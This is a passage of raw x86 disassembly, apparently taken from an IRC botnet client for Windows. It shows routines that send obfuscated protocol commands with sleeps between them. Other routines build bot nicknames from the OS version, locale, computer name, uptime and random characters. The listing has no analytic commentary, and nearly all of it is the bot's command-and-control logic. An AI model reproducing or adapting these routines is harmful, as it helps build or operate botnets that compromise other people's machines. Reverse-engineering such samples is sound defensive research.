lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset dword_4476E0
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 28h
mov esi, eax
push 3E8h
call dword_437190 ; Sleep
mov eax, esi
loc_41CF22: ; CODE XREF: sub_41CEC0+1A�j
pop esi
leave
retn
sub_41CEC0 endp
; =============== S U B R O U T I N E =======================================
sub_41CF25 proc near ; CODE XREF: sub_40A9FE+2323�p
; sub_40A9FE+29DD�p ...
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41CF30
xor eax, eax
inc eax
jmp short locret_41CF49
; ---------------------------------------------------------------------------
loc_41CF30: ; CODE XREF: sub_41CF25+4�j
push [esp+arg_0]
push offset aKc4l5_savs3_ ; "KC4L5.sAVS3."
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 14h
locret_41CF49: ; CODE XREF: sub_41CF25+9�j
retn 4
sub_41CF25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF4C proc near ; CODE XREF: sub_423C7A+471�p
; sub_423C7A+5D4�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41CF99
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_C]
push 26F6h
push eax
call sub_42B8AA
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_41CF9E
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_8]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz short loc_41CF9E
loc_41CF99: ; CODE XREF: sub_41CF4C+15�j
xor eax, eax
inc eax
jmp short loc_41CFDD
; ---------------------------------------------------------------------------
loc_41CF9E: ; CODE XREF: sub_41CF4C+36�j
; sub_41CF4C+4B�j
lea eax, [ebp+var_26F8]
push eax
push offset dword_443EB0
call sub_415603
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aZyvgp1mxobt0_0 ; "zyVGp1MxObt0"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 20h
mov esi, eax
push 3E8h
call dword_437190 ; Sleep
mov eax, esi
loc_41CFDD: ; CODE XREF: sub_41CF4C+50�j
pop esi
leave
retn
sub_41CF4C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CFE0 proc near ; CODE XREF: sub_423C7A:loc_4240F2�p
; sub_423C7A:loc_424255�p ...
var_26F8 = byte ptr -26F8h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = byte ptr 18h
push ebp
mov ebp, esp
mov eax, 26F8h
call sub_429B60
push esi
mov esi, [ebp+arg_0]
cmp byte ptr [esi+4], 0
jz short loc_41D02D
lea eax, [ebp+arg_10]
push eax
lea eax, [ebp+var_26F8]
push [ebp+arg_C]
push 26F6h
push eax
call sub_42B8AA
add esp, 10h
cmp [ebp+arg_8], 0
jz short loc_41D032
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_8]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz short loc_41D032
loc_41D02D: ; CODE XREF: sub_41CFE0+15�j
xor eax, eax
inc eax
jmp short loc_41D071
; ---------------------------------------------------------------------------
loc_41D032: ; CODE XREF: sub_41CFE0+36�j
; sub_41CFE0+4B�j
lea eax, [ebp+var_26F8]
push eax
push offset dword_443EB0
call sub_415603
lea eax, [ebp+var_26F8]
push eax
push [ebp+arg_4]
push offset aG7IvGks9l1_0 ; "g7/IV/gks9L1"
push offset aSSS_1 ; "%s %s :%s\r\n"
push dword ptr [esi]
push esi
call sub_41C4E4
add esp, 20h
mov esi, eax
push 3E8h
call dword_437190 ; Sleep
mov eax, esi
loc_41D071: ; CODE XREF: sub_41CFE0+50�j
pop esi
leave
retn
sub_41CFE0 endp
; =============== S U B R O U T I N E =======================================
sub_41D074 proc near ; CODE XREF: sub_420AB8+62�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41D07F
xor eax, eax
inc eax
jmp short locret_41D098
; ---------------------------------------------------------------------------
loc_41D07F: ; CODE XREF: sub_41D074+4�j
push [esp+arg_0]
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 14h
locret_41D098: ; CODE XREF: sub_41D074+9�j
retn 4
sub_41D074 endp
; =============== S U B R O U T I N E =======================================
sub_41D09B proc near ; CODE XREF: sub_40A9FE+2352�p
; sub_420AB8+58�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
cmp byte ptr [ecx+4], 0
jnz short loc_41D0A6
xor eax, eax
inc eax
jmp short locret_41D0C3
; ---------------------------------------------------------------------------
loc_41D0A6: ; CODE XREF: sub_41D09B+4�j
push [esp+arg_4]
push [esp+4+arg_0]
push offset a5h5br_qpSm1 ; "5H5BR.qp/sm1"
push offset dword_4476F8
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 18h
locret_41D0C3: ; CODE XREF: sub_41D09B+9�j
retn 8
sub_41D09B endp
; =============== S U B R O U T I N E =======================================
sub_41D0C6 proc near ; CODE XREF: sub_40A9FE+2374�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41D0D1
xor eax, eax
inc eax
jmp short locret_41D0EA
; ---------------------------------------------------------------------------
loc_41D0D1: ; CODE XREF: sub_41D0C6+4�j
push [esp+arg_0]
push offset aYjmlc1btsf10_0 ; "yJmlc1btsF10"
push offset aSS ; "%s %s\r\n"
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 14h
locret_41D0EA: ; CODE XREF: sub_41D0C6+9�j
retn 4
sub_41D0C6 endp
; =============== S U B R O U T I N E =======================================
sub_41D0ED proc near ; CODE XREF: sub_40A9FE+2401�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
cmp byte ptr [eax+4], 0
jnz short loc_41D0FB
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D0FB: ; CODE XREF: sub_41D0ED+8�j
push [esp+arg_4]
push offset aS_6 ; "%s\r\n"
push dword ptr [eax]
push eax
call sub_41C4E4
add esp, 10h
retn
sub_41D0ED endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D110 proc near ; CODE XREF: sub_41D163+14�p
; sub_420D29+41�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp byte ptr [ecx+4], 0
jnz short loc_41D11E
xor eax, eax
inc eax
jmp short loc_41D15F
; ---------------------------------------------------------------------------
loc_41D11E: ; CODE XREF: sub_41D110+7�j
cmp [ebp+arg_8], 0
jnz short loc_41D141
push [ebp+arg_4]
push [ebp+arg_0]
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push offset dword_4476F8
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 18h
jmp short loc_41D15F
; ---------------------------------------------------------------------------
loc_41D141: ; CODE XREF: sub_41D110+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push offset aLcxMHdpwr1 ; "lCX/m/HdpWr1"
push offset dword_447704
push dword ptr [ecx]
push ecx
call sub_41C4E4
add esp, 1Ch
loc_41D15F: ; CODE XREF: sub_41D110+C�j
; sub_41D110+2F�j
pop ebp
retn 0Ch
sub_41D110 endp
; =============== S U B R O U T I N E =======================================
sub_41D163 proc near ; CODE XREF: sub_420CB6+57�p
arg_0 = dword ptr 4
cmp byte ptr [ecx+4], 0
jnz short loc_41D16E
xor eax, eax
inc eax
jmp short locret_41D17E
; ---------------------------------------------------------------------------
loc_41D16E: ; CODE XREF: sub_41D163+4�j
push 0
push [esp+4+arg_0]
push dword ptr [ecx+8]
call sub_41D110
xor eax, eax
locret_41D17E: ; CODE XREF: sub_41D163+9�j
retn 4
sub_41D163 endp
; =============== S U B R O U T I N E =======================================
sub_41D181 proc near ; CODE XREF: sub_418FA1+5E9�p
; sub_418FA1+5F5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov [ecx+24h], eax
mov eax, [esp+arg_0]
test eax, eax
jnz short loc_41D197
call sub_41D318
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D197: ; CODE XREF: sub_41D181+D�j
cmp eax, 1
jnz short loc_41D1A3
call sub_41D475
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1A3: ; CODE XREF: sub_41D181+19�j
cmp eax, 3
jnz short loc_41D1AF
call sub_41D2AB
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1AF: ; CODE XREF: sub_41D181+25�j
cmp eax, 4
jnz short loc_41D1BB
call sub_41D242
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1BB: ; CODE XREF: sub_41D181+31�j
cmp eax, 2
jz short loc_41D1F0
cmp eax, 5
jnz short loc_41D1CC
call sub_41D5EF
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1CC: ; CODE XREF: sub_41D181+42�j
cmp eax, 6
jnz short loc_41D1D8
call sub_41D6A6
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1D8: ; CODE XREF: sub_41D181+4E�j
cmp eax, 7
jnz short loc_41D1E4
call sub_41D7D2
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1E4: ; CODE XREF: sub_41D181+5A�j
cmp eax, 8
jnz short loc_41D1F0
call sub_41D917
jmp short loc_41D1F5
; ---------------------------------------------------------------------------
loc_41D1F0: ; CODE XREF: sub_41D181+3D�j
; sub_41D181+66�j
call sub_41D1FD
loc_41D1F5: ; CODE XREF: sub_41D181+14�j
; sub_41D181+20�j ...
mov dword_458448, eax
retn 8
sub_41D181 endp
; =============== S U B R O U T I N E =======================================
sub_41D1FD proc near ; CODE XREF: sub_41D181:loc_41D1F0�p
push ebx
push esi
push edi
push 10h
mov ebx, offset byte_45846C
push 0
push ebx
mov edi, ecx
call sub_429760
xor esi, esi
add esp, 0Ch
cmp [edi+24h], esi
jl short loc_41D235
loc_41D21B: ; CODE XREF: sub_41D1FD+36�j
call sub_429B9C
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov byte_45846C[esi], dl
inc esi
cmp esi, [edi+24h]
jle short loc_41D21B
loc_41D235: ; CODE XREF: sub_41D1FD+1C�j
and byte_45846C[esi], 0
pop edi
mov eax, ebx
pop esi
pop ebx
retn
sub_41D1FD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D242 proc near ; CODE XREF: sub_41D181+33�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
xor ebx, ebx
push 10h
mov esi, offset byte_45844C
push ebx
push esi
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_4]
mov [ebp+var_4], 10h
push eax
push esi
call dword_456F90 ; GetComputerNameA
movsx eax, byte_45844C
push 41h
pop ecx
loc_41D277: ; CODE XREF: sub_41D242+40�j
cmp eax, ecx
jnz short loc_41D27E
xor ebx, ebx
inc ebx
loc_41D27E: ; CODE XREF: sub_41D242+37�j
inc ecx
cmp ecx, 5Bh
jl short loc_41D277
push 61h
pop ecx
loc_41D287: ; CODE XREF: sub_41D242+50�j
cmp eax, ecx
jnz short loc_41D28E
xor ebx, ebx
inc ebx
loc_41D28E: ; CODE XREF: sub_41D242+47�j
inc ecx
cmp ecx, 7Bh
jl short loc_41D287
test ebx, ebx
jnz short loc_41D2A5
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push esi
call sub_429B03
pop ecx
pop ecx
loc_41D2A5: ; CODE XREF: sub_41D242+54�j
mov eax, esi
pop esi
pop ebx
leave
retn
sub_41D242 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D2AB proc near ; CODE XREF: sub_41D181+27�p
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
push 10h
mov esi, offset byte_458418
push 0
push esi
mov ebx, ecx
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370F8 ; GetLocaleInfoA
lea eax, [ebp+var_10]
push eax
push offset dword_447714
push esi
call sub_429B03
push esi
call sub_4293A0
add esp, 10h
mov edi, eax
jmp short loc_41D30C
; ---------------------------------------------------------------------------
loc_41D2F7: ; CODE XREF: sub_41D2AB+64�j
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_458418[edi], dl
inc edi
loc_41D30C: ; CODE XREF: sub_41D2AB+4A�j
cmp edi, [ebx+24h]
jle short loc_41D2F7
mov eax, esi
pop edi
pop esi
pop ebx
leave
retn
sub_41D2AB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D318 proc near ; CODE XREF: sub_41D181+F�p
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_90 = dword ptr -90h
var_6 = byte ptr -6
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0A0h
push ebx
push esi
push edi
push 10h
mov edi, offset byte_45847C
push 0
push edi
mov [ebp+var_4], ecx
mov esi, offset off_447718
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_A0]
mov [ebp+var_A0], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_41D43D
push [ebp+var_98]
push [ebp+var_9C]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429BBE
add esp, 14h
cmp [ebp+var_9C], 4
jnz short loc_41D3D0
cmp [ebp+var_98], 0
jnz short loc_41D3B0
cmp [ebp+var_90], 1
jnz short loc_41D399
mov esi, offset a95 ; "95"
loc_41D399: ; CODE XREF: sub_41D318+7A�j
cmp [ebp+var_90], 2
jnz loc_41D43D
mov esi, offset aNt_0 ; "NT"
jmp loc_41D43D
; ---------------------------------------------------------------------------
loc_41D3B0: ; CODE XREF: sub_41D318+71�j
cmp [ebp+var_98], 0Ah
jnz short loc_41D3C0
mov esi, offset a98 ; "98"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D3C0: ; CODE XREF: sub_41D318+9F�j
cmp [ebp+var_98], 5Ah
jnz short loc_41D43D
mov esi, offset aMe_0 ; "ME"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D3D0: ; CODE XREF: sub_41D318+68�j
cmp [ebp+var_9C], 5
jnz short loc_41D409
cmp [ebp+var_98], 0
jnz short loc_41D3E9
mov esi, offset a2k ; "2K"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D3E9: ; CODE XREF: sub_41D318+C8�j
cmp [ebp+var_98], 1
jnz short loc_41D3F9
mov esi, offset aXp ; "XP"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D3F9: ; CODE XREF: sub_41D318+D8�j
cmp [ebp+var_98], 2
jnz short loc_41D43D
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D409: ; CODE XREF: sub_41D318+BF�j
cmp [ebp+var_9C], 6
jnz short loc_41D43D
cmp [ebp+var_98], 0
jnz short loc_41D42F
cmp [ebp+var_6], 1
jnz short loc_41D428
mov esi, offset aVista_0 ; "Vista"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D428: ; CODE XREF: sub_41D318+107�j
mov esi, offset a2k8 ; "2K8"
jmp short loc_41D43D
; ---------------------------------------------------------------------------
loc_41D42F: ; CODE XREF: sub_41D318+101�j
cmp [ebp+var_98], 1
jnz short loc_41D43D
mov esi, offset a7 ; "7"
loc_41D43D: ; CODE XREF: sub_41D318+3F�j
; sub_41D318+88�j ...
push esi
push edi
call sub_429B03
push edi
call sub_4293A0
mov ebx, [ebp+var_4]
add esp, 0Ch
mov esi, eax
jmp short loc_41D469
; ---------------------------------------------------------------------------
loc_41D454: ; CODE XREF: sub_41D318+154�j
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
add dl, 30h
mov byte_45847C[esi], dl
inc esi
loc_41D469: ; CODE XREF: sub_41D318+13A�j
cmp esi, [ebx+24h]
jle short loc_41D454
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_41D318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D475 proc near ; CODE XREF: sub_41D181+1B�p
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_9C = dword ptr -9Ch
var_12 = byte ptr -12h
var_10 = byte ptr -10h
push ebp
mov ebp, esp
sub esp, 0ACh
push esi
push edi
push 10h
mov edi, offset dword_45848C
push 0
push edi
mov esi, offset off_447718
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370F8 ; GetLocaleInfoA
lea eax, [ebp+var_AC]
mov [ebp+var_AC], 9Ch
push eax
call dword_437050 ; GetVersionExA
test eax, eax
jz loc_41D5A9
push [ebp+var_A4]
push [ebp+var_A8]
push offset aD_D ; "%d.%d"
push 4
push esi
call sub_429BBE
add esp, 14h
cmp [ebp+var_A8], 4
jnz short loc_41D53C
cmp [ebp+var_A4], 0
jnz short loc_41D51C
cmp [ebp+var_9C], 1
jnz short loc_41D505
mov esi, offset a95 ; "95"
loc_41D505: ; CODE XREF: sub_41D475+89�j
cmp [ebp+var_9C], 2
jnz loc_41D5A9
mov esi, offset aNt_0 ; "NT"
jmp loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D51C: ; CODE XREF: sub_41D475+80�j
cmp [ebp+var_A4], 0Ah
jnz short loc_41D52C
mov esi, offset a98 ; "98"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D52C: ; CODE XREF: sub_41D475+AE�j
cmp [ebp+var_A4], 5Ah
jnz short loc_41D5A9
mov esi, offset aMe_0 ; "ME"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D53C: ; CODE XREF: sub_41D475+77�j
cmp [ebp+var_A8], 5
jnz short loc_41D575
cmp [ebp+var_A4], 0
jnz short loc_41D555
mov esi, offset a2k ; "2K"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D555: ; CODE XREF: sub_41D475+D7�j
cmp [ebp+var_A4], 1
jnz short loc_41D565
mov esi, offset aXp ; "XP"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D565: ; CODE XREF: sub_41D475+E7�j
cmp [ebp+var_A4], 2
jnz short loc_41D5A9
mov esi, offset a2k3_0 ; "2K3"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D575: ; CODE XREF: sub_41D475+CE�j
cmp [ebp+var_A8], 6
jnz short loc_41D5A9
cmp [ebp+var_A4], 0
jnz short loc_41D59B
cmp [ebp+var_12], 1
jnz short loc_41D594
mov esi, offset aVista_0 ; "Vista"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D594: ; CODE XREF: sub_41D475+116�j
mov esi, offset a2k8 ; "2K8"
jmp short loc_41D5A9
; ---------------------------------------------------------------------------
loc_41D59B: ; CODE XREF: sub_41D475+110�j
cmp [ebp+var_A4], 1
jnz short loc_41D5A9
mov esi, offset a7 ; "7"
loc_41D5A9: ; CODE XREF: sub_41D475+4E�j
; sub_41D475+97�j ...
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
add edx, 30h
push edx
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
add edx, 30h
push edx
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_10]
add edx, 30h
push edx
push esi
push eax
push offset dword_44771C
push edi
call sub_429B03
add esp, 1Ch
mov eax, edi
pop edi
pop esi
leave
retn
sub_41D475 endp
; =============== S U B R O U T I N E =======================================
sub_41D5EF proc near ; CODE XREF: sub_41D181+44�p
var_12 = byte ptr -12h
var_10 = byte ptr -10h
sub esp, 14h
push ebx
push ebp
push esi
push edi
xor ebp, ebp
push 10h
mov edi, offset dword_45849C
push ebp
push edi
mov esi, ecx
call sub_429760
add esp, 0Ch
mov ecx, esi
mov [esi+2Ch], ebp
mov [esi+30h], ebp
mov [esi+38h], ebp
call sub_41DA15
mov ebx, eax
lea eax, [esp+24h+var_10]
push 10h
push eax
push 7
push 800h
call dword_4370F8 ; GetLocaleInfoA
push ebx
mov ebx, dword_437090
push edi
call ebx ; dword_437090
lea eax, [esp+24h+var_10]
push eax
push edi
call ebx ; dword_437090
push offset dword_447730
push edi
call ebx ; dword_437090
xor eax, eax
inc eax
cmp [esi+2Ch], ebp
jz short loc_41D656
push 2
pop eax
loc_41D656: ; CODE XREF: sub_41D5EF+62�j
cmp [esi+30h], ebp
jz short loc_41D65C
inc eax
loc_41D65C: ; CODE XREF: sub_41D5EF+6A�j
cmp [esi+38h], ebp
jz short loc_41D662
inc eax
loc_41D662: ; CODE XREF: sub_41D5EF+70�j
push 5
pop esi
cmp eax, esi
jge short loc_41D694
sub esi, eax
loc_41D66B: ; CODE XREF: sub_41D5EF+A3�j
call sub_429B9C
push 0Ah
cdq
pop ecx
idiv ecx
lea eax, [esp+24h+var_12]
push edx
push offset dword_44772C
push eax
call sub_429B03
add esp, 0Ch
lea eax, [esp+24h+var_12]
push eax
push edi
call ebx ; dword_437090
dec esi
jnz short loc_41D66B
loc_41D694: ; CODE XREF: sub_41D5EF+78�j
push offset dword_447730
push edi
call ebx ; dword_437090
mov eax, edi
pop edi
pop esi
pop ebp
pop ebx
add esp, 14h
retn
sub_41D5EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D6A6 proc near ; CODE XREF: sub_41D181+50�p
var_4C = byte ptr -4Ch
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 4Ch
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_458428
push 0
push ebx
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_41BAFF
pop ecx
mov [ebp+var_C], eax
call sub_429B9C
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_4C]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429B9C
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_7], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_6], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_5], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_4], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_3], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_2], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_4C]
mov [ebp+var_1], al
call sub_429B9C
cdq
idiv esi
mov dl, [ebp+edx+var_4C]
movsx eax, dl
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
jbe short loc_41D7BD
push [ebp+var_C]
push offset aDCCCCCCCCC ; "|%d|%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 30h
jmp short loc_41D7CB
; ---------------------------------------------------------------------------
loc_41D7BD: ; CODE XREF: sub_41D6A6+102�j
push offset aCCCCCCCCC ; "%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 2Ch
loc_41D7CB: ; CODE XREF: sub_41D6A6+115�j
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_41D6A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D7D2 proc near ; CODE XREF: sub_41D181+5C�p
var_54 = byte ptr -54h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_45845C
push 0
push ebx
mov [ebp+var_14], ecx
call sub_429760
add esp, 0Ch
call dword_437188 ; GetTickCount
push eax
call sub_41BAFF
pop ecx
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
call sub_41DAC6
mov [ebp+var_10], eax
call sub_429B9C
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_54]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429B9C
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_7], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_6], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_5], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_4], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_3], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_2], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_54]
mov [ebp+var_1], al
call sub_429B9C
cdq
idiv esi
mov dl, [ebp+edx+var_54]
movsx eax, dl
push eax
cmp [ebp+var_C], 5
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
movsx eax, [ebp+var_5]
push eax
movsx eax, [ebp+var_6]
push eax
movsx eax, [ebp+var_7]
push eax
movsx eax, [ebp+var_8]
push eax
push [ebp+var_10]
jbe short loc_41D8FA
push [ebp+var_C]
push offset aDSCCCCCCCCC ; "|%d|%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 34h
jmp short loc_41D908
; ---------------------------------------------------------------------------
loc_41D8FA: ; CODE XREF: sub_41D7D2+113�j
push offset aSCCCCCCCCC ; "%s%c%c%c%c%c%c%c%c%c"
push ebx
call sub_429B03
add esp, 30h
loc_41D908: ; CODE XREF: sub_41D7D2+126�j
mov ecx, [ebp+var_14]
call sub_41DA15
pop edi
mov eax, ebx
pop esi
pop ebx
leave
retn
sub_41D7D2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D917 proc near ; CODE XREF: sub_41D181+68�p
var_48 = byte ptr -48h
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
push ebp
mov ebp, esp
sub esp, 48h
push ebx
push esi
push edi
push 10h
mov ebx, offset dword_458438
push 0
push ebx
call sub_429760
call sub_429B9C
push 1Ah
mov esi, offset aAbcdefghijklmn ; "abcdefghijklmnopqrstuvwxyz1234567890abc"...
cdq
pop ecx
lea edi, [ebp+var_48]
idiv ecx
push 0Fh
pop ecx
rep movsd
movsw
movsb
add dl, 61h
mov [ebp+var_8], dl
call sub_429B9C
push 24h
pop esi
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_7], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_6], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_5], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_4], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_3], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_2], al
call sub_429B9C
cdq
mov ecx, esi
idiv ecx
mov al, [ebp+edx+var_48]
mov [ebp+var_1], al
call sub_429B9C
cdq
idiv esi
movsx eax, [ebp+edx+var_48]
push eax
movsx eax, [ebp+var_1]
push eax
movsx eax, [ebp+var_2]
push eax
movsx eax, [ebp+var_3]
push eax
movsx eax, [ebp+var_4]
push eax
